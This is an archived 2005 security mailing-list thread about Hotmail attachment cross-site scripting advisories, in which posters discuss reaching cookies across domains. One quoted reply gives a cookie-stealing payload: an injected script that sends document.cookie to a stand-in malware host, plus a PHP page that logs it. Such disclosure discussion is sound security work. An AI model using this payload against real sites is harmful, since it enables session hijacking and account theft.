lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Wed, 4 May 2005 11:15:10 -0500
From: "Luis A. Cortes Zavala" <luis.cortes@...ersec.co.uk>
To: <vulnwatch@...nwatch.org>,
	<full-disclosure@...ts.grok.org.uk>,
	<bugtraq@...urityfocus.com>
Subject: RE: [Full-disclosure] Re: [VulnWatch] Hotmail Advisories


The problem here is that since this new window for attachments, you can not
reach the domain for ask cookie, the document.cookie, is empty, you need to
inject innerHTML for ask cookie, but yes it's possible. 

The window that opens attachments is not in the same domain so there's not
cookie, so you have to make cross domain code that it's supposed not to be
possible. So first you need to return to your main window and write some
code to have access.

Cheers
Luis Alberto Cortes Zavala



-----Mensaje original-----
De: Jerome Athias [mailto:jerome.athias@...e.fr] 
Enviado el: miƩrcoles, 04 de mayo de 2005 7:41
Para: Sherwyn Williams; Luis A. Cortes Zavala;
full-disclosure@...ts.grok.org.uk; vulnwatch@...nwatch.org;
bugtraq@...urityfocus.com
Asunto: Re: [Full-disclosure] Re: [VulnWatch] Hotmail Advisories


> Ok I think I get what you are saying, however to use this vuln, would
> need to have a script running on a server some where that recieves the 
> username and password?
>
> Or just based on what you have here this can be possible. If one does not 
> have knowledge of java script, all the would have to do is use those 
> various html codes you wrote and send that to them as an attachment, but 
> how would I get the username and password ????

For example, this is a simple way to steal a cookie:

Inject this code:

<script>window.open('http://www.your-malware-website.com/givemecook.php?cook
='%2Bdocument.cookie);</script>


And on "your-malware-website" put this page:

givemecook.php:
<?
echo $HTTP_COOKIE_VARS["cook"];
?>

and so, the cookie will be logged in "your-malware-website"


>> I was testing this until I can get some working code, the authorization 
>> and
>> validation of the site is one of the better that I seen on a mailing 
>> system,
>> I never heard about vulnerabilities of hotmail as in others systems, I 
>> just
>> have knowledge of two flaws discovered. One on 1999 is from George 
>> Guninski,
>> and the other when the pwdreset function make its public, every year 
>> hotmail
>> is updated, and getting more secure, and it's hard to believe that no one
>> have found this before.

Try to play with this in hotmail
http://seclists.org/lists/bugtraq/2005/Feb/0473.html

Cheers,
Jerome 





Powered by blists - more mailing lists